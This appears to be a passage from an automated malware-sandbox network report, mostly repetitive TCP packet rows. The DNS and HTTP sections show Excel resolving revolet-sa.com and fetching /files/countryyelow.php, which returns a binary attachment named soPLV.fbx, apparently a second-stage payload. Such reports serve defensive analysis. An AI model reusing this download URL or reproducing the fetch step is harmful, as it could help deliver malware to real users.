                        Apr 7, 2021 00:40:06.043036938 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.043073893 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.043076038 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.043112993 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.043113947 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.043153048 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.043155909 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.043191910 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.043194056 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.043234110 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.043241024 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.043283939 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.043284893 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.043323040 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.043325901 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.043365955 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.043369055 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.043405056 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.043406963 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.043443918 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.043451071 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.043484926 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.043498993 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.043524027 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.043536901 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.043569088 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.043581009 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.043622971 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.043622971 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.043664932 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.043668032 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.043703079 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.043703079 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.043745041 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.043746948 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.043782949 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.043787003 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.043823004 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.043828964 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.043859959 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.043864012 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.043905973 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.043909073 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.043950081 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.043951988 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.043992043 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.043998957 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.044030905 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.044033051 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.044070005 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.200748920 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.200812101 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.200840950 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.200850010 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.200866938 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.200900078 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.200908899 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.200943947 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.200958014 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.200987101 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.201001883 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.201028109 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.201059103 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.201066971 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.201070070 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.201103926 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.201113939 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.201143026 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.201159954 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.201181889 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.201191902 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.201230049 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.201232910 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.201273918 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.201282024 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.201314926 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.201325893 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.201354980 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.201364994 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.201406002 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.201431990 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.201472044 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.201483965 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.201512098 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.201534033 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.201551914 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.201559067 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.201591969 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.201602936 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.201641083 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.203238010 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.204634905 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.204843044 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.204895020 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.204926968 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.204936981 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.204952955 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.204978943 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.205017090 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.205029011 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.205054998 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.205055952 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.205069065 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.205095053 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.205115080 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.205141068 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.205158949 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.205177069 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.205179930 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.205229044 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.205238104 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.205271959 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.205286026 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.205312014 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.205319881 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.205353022 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.205358982 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.205420017 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.205435038 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.205475092 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.205493927 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.205513954 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.205554962 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.205584049 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.205593109 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.205594063 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.205596924 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.205631971 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.205653906 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.205672979 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.205679893 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.205713987 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.205727100 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.205760956 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.205766916 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.205804110 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.205816984 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.205843925 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.205848932 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.205883026 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.205888987 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.205921888 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.205928087 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.205959082 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.205982924 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.205997944 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.206002951 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.206036091 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.206038952 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.206079960 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.206084013 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.206125975 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.206126928 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.206163883 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.206177950 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.206202984 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.206216097 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.206242085 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.206254959 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.206279993 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.206304073 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.206320047 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.206320047 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.206358910 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.206383944 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.206404924 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.206406116 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.206449032 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.206460953 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.206486940 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.206501007 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.206526041 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.206537962 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.206563950 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.206579924 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.206602097 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.206614971 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.206640005 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.206660032 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.206682920 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.206695080 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.206729889 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.206731081 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.206773043 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.206778049 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.206810951 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.206835985 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.206850052 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.206862926 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.206890106 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.206902027 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.206928015 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.206942081 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.206967115 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.206993103 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.207015038 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.207026958 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.207062960 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.207066059 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.207107067 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.207112074 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.207144976 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.207159042 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.207184076 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.207195997 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.207222939 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.207236052 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.207262039 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.207273006 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.207309961 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.207323074 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.207350016 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.207361937 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.207390070 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.207402945 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.207428932 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.207441092 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.207468033 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.207485914 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.207515955 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.207521915 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.207559109 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.207572937 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.207596064 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.207598925 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.207633972 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.207654953 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.207674980 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.207685947 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.207712889 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.207726955 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.207776070 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.210040092 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.231427908 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.231492043 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.231525898 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.231530905 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.231539011 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.231570959 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.231580973 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.231625080 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.231626034 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.231664896 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.231668949 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.231704950 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.231713057 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.231745958 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.231758118 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.231785059 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.231791019 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.231823921 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.231825113 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.231863976 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.231863976 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.231911898 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.231956005 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.231961966 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.231981993 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.231993914 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.231995106 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.232033968 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.232038975 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.232089043 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.232090950 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.232130051 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.232157946 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.232167006 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.232168913 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.232208967 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.232213974 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.232245922 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.232253075 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.232285976 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.232290030 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.232326031 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.232328892 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.232367992 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.232374907 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.232418060 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.232418060 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.232458115 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.232470989 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.232497931 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.232527018 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.232536077 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.232536077 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.232573986 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.232574940 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.232614040 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.232633114 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.232655048 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.232661009 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.232697964 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.232708931 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.232749939 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.232750893 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.232789040 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.232790947 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.232831001 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.232867956 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.232868910 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.232908010 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.232937098 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.232945919 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.232945919 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.232985020 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.232986927 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.233035088 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.233036041 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.233078003 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.233079910 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.233118057 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.233120918 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.233141899 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.233150005 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:06.233150959 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.233190060 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.234112024 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:06.241472960 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:11.043802023 CEST8049165192.232.249.186192.168.2.22
                        Apr 7, 2021 00:40:11.043909073 CEST4916580192.168.2.22192.232.249.186
                        Apr 7, 2021 00:40:41.044205904 CEST8049165192.232.249.186192.168.2.22

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Apr 7, 2021 00:40:04.542113066 CEST5219753192.168.2.228.8.8.8
                        Apr 7, 2021 00:40:04.590847969 CEST53521978.8.8.8192.168.2.22

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        Apr 7, 2021 00:40:04.542113066 CEST192.168.2.228.8.8.80x2c09Standard query (0)revolet-sa.comA (IP address)IN (0x0001)

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        Apr 7, 2021 00:40:04.590847969 CEST8.8.8.8192.168.2.220x2c09No error (0)revolet-sa.com192.232.249.186A (IP address)IN (0x0001)

                        HTTP Request Dependency Graph

                        • revolet-sa.com

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.2249165192.232.249.18680C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        TimestampkBytes transferredDirectionData
                        Apr 7, 2021 00:40:04.807867050 CEST0OUTGET /files/countryyelow.php HTTP/1.1
                        Accept: */*
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: revolet-sa.com
                        Connection: Keep-Alive
                        Apr 7, 2021 00:40:05.259238005 CEST2INHTTP/1.1 200 OK
                        Date: Tue, 06 Apr 2021 22:40:04 GMT
                        Server: Apache
                        Content-Disposition: attachment; filename="soPLV.fbx"
                        Upgrade: h2,h2c
                        Connection: Upgrade, Keep-Alive
                        Vary: Accept-Encoding
                        Content-Encoding: gzip
                        Keep-Alive: timeout=5, max=75
                        Transfer-Encoding: chunked
                        Content-Type: application/octet-stream
